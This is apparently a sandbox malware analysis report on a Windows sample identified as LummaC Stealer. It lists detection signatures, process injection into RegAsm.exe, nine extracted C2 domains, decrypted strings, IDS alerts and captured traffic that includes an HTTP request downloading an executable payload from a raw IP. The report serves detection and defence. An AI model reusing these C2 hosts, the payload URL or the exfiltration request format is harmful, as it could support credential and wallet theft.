Edit tour

Windows Analysis Report
EBUdultKh7.exe

Overview

General Information

Sample name:	EBUdultKh7.exe renamed because original name is a hash value
Original sample name:	7c8c89e28b6034fe5b87b59d127ba505.exe
Analysis ID:	1572963
MD5:	7c8c89e28b6034fe5b87b59d127ba505
SHA1:	114a06cebd0501b923e4b4074203312e24cab40f
SHA256:	c4d8d3cb7debaa8a0bc6ece6157ace94e11d3f03cdd0093d6daf6155bf5e927c
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

EBUdultKh7.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\EBUdultKh7.exe" MD5: 7C8C89E28B6034FE5B87B59D127BA505)

csc.exe (PID: 7616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7668 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F80.tmp" "c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 7688 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["formy-spill.biz", "covery-mover.biz", "dwell-exclaim.biz", "impend-differ.biz", "print-vexer.biz", "se-blurry.biz", "stare-roar.cyou", "dare-curbys.biz", "zinc-sneark.biz"], "Build id": "yau6Na--6928154717"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: EBUdultKh7.exe PID: 7492	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EBUdultKh7.exe", ParentImage: C:\Users\user\Desktop\EBUdultKh7.exe, ParentProcessId: 7492, ParentProcessName: EBUdultKh7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", ProcessId: 7616, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\EBUdultKh7.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EBUdultKh7.exe", ParentImage: C:\Users\user\Desktop\EBUdultKh7.exe, ParentProcessId: 7492, ParentProcessName: EBUdultKh7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline", ProcessId: 7616, ProcessName: csc.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:45:03.721511+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	104.21.78.149	443	TCP
2024-12-11T10:45:05.753648+0100	2028371	3	Unknown Traffic	192.168.2.8	49708	104.21.78.149	443	TCP
2024-12-11T10:45:07.915803+0100	2028371	3	Unknown Traffic	192.168.2.8	49709	104.21.78.149	443	TCP
2024-12-11T10:45:09.842338+0100	2028371	3	Unknown Traffic	192.168.2.8	49710	104.21.78.149	443	TCP
2024-12-11T10:45:12.022254+0100	2028371	3	Unknown Traffic	192.168.2.8	49711	104.21.78.149	443	TCP
2024-12-11T10:45:14.263320+0100	2028371	3	Unknown Traffic	192.168.2.8	49712	104.21.78.149	443	TCP
2024-12-11T10:45:16.879410+0100	2028371	3	Unknown Traffic	192.168.2.8	49713	104.21.78.149	443	TCP
2024-12-11T10:45:21.999225+0100	2028371	3	Unknown Traffic	192.168.2.8	49715	104.21.78.149	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:45:04.422172+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49707	104.21.78.149	443	TCP
2024-12-11T10:45:06.477400+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49708	104.21.78.149	443	TCP
2024-12-11T10:45:22.736552+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49715	104.21.78.149	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:45:04.422172+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49707	104.21.78.149	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:45:06.477400+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49708	104.21.78.149	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T10:45:14.988143+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49712	104.21.78.149	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: EBUdultKh7.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://stare-roar.cyou/api	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou/_b_=	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou:443/api	Avira URL Cloud: Label: malware
Source: stare-roar.cyou	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou:443/apin.txtPK	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou/pi	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou/	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou:443/apil	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou/1	Avira URL Cloud: Label: malware
Source: https://stare-roar.cyou//c	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 5.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "covery-mover.biz", "dwell-exclaim.biz", "impend-differ.biz", "print-vexer.biz", "se-blurry.biz", "stare-roar.cyou", "dare-curbys.biz", "zinc-sneark.biz"], "Build id": "yau6Na--6928154717"}

Multi AV Scanner detection for domain / URL

Source: stare-roar.cyou	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.44.131/infopage/vsom.exeP	Virustotal: Detection: 12%	Perma Link
Source: http://147.45.44.131/infopage/vsom.exe	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: EBUdultKh7.exe	Virustotal: Detection: 64%			Perma Link
Source: EBUdultKh7.exe	ReversingLabs: Detection: 87%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: EBUdultKh7.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stare-roar.cyou
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yau6Na--6928154717

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0041692E CryptUnprotectData,

5_2_0041692E

Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49715 version: TLS 1.2

Source: EBUdultKh7.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.pdb source: EBUdultKh7.exe, 00000000.00000002.1415544553.00000000016DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q8C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.pdb source: EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003304000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	5_2_00418835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, edx	5_2_0040E8DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+60AFE849h]	5_2_004269D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	5_2_0043FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx+02h]	5_2_0042C347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_0043A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, dword ptr [ecx+edx+3Ch]	5_2_0043A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx+02h]	5_2_0042C33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2F88562Ah]	5_2_0040AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4B79FCB3h]	5_2_00440420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+04h]	5_2_004237B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h]	5_2_004237B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_004237B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, bx	5_2_00425872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_00435030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	5_2_0041C9EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	5_2_00427190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	5_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_0042D25E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+08h], edi	5_2_0042E2C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	5_2_0042AAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000D7h]	5_2_0043829A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+60AFE851h]	5_2_0040E358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_00425B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_0043E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_0043E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	5_2_004023B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_0043E460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	5_2_00427468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00415CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-44000B0Ch]	5_2_00415CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+edx], 0000h	5_2_00415CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00415CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea ecx, dword ptr [eax+03h]	5_2_0041CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	5_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx]	5_2_0043BC89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp al, 2Eh	5_2_0042748D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_0041BD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_0042A520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	5_2_00427DD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_0043E5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec edx	5_2_004375F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_00419599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	5_2_004295AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+165CF15Dh]	5_2_00426E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_00426E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_0043E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-75h]	5_2_004226E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_00401F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-20h]	5_2_00428F22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00428FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00428FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+19CBD56Ch]	5_2_004387D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	5_2_0043E7A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49712 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49715 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 104.21.78.149:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: stare-roar.cyou
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 11 Dec 2024 09:45:00 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 29 Nov 2024 16:14:55 GMTETag: "4b400-6280f7fe39e37"Accept-Ranges: bytesContent-Length: 308224Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 0d 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 b8 00 00 00 00 00 00 f0 9c 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dd 2b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 05 00 e8 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 2d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 f7 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b7 20 00 00 00 10 04 00 00 22 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 0c fd 00 00 00 40 04 00 00 56 00 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 40 05 00 00 02 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 3d 00 00 00 50 05 00 00 3e 00 00 00 76 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /infopage/vsom.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

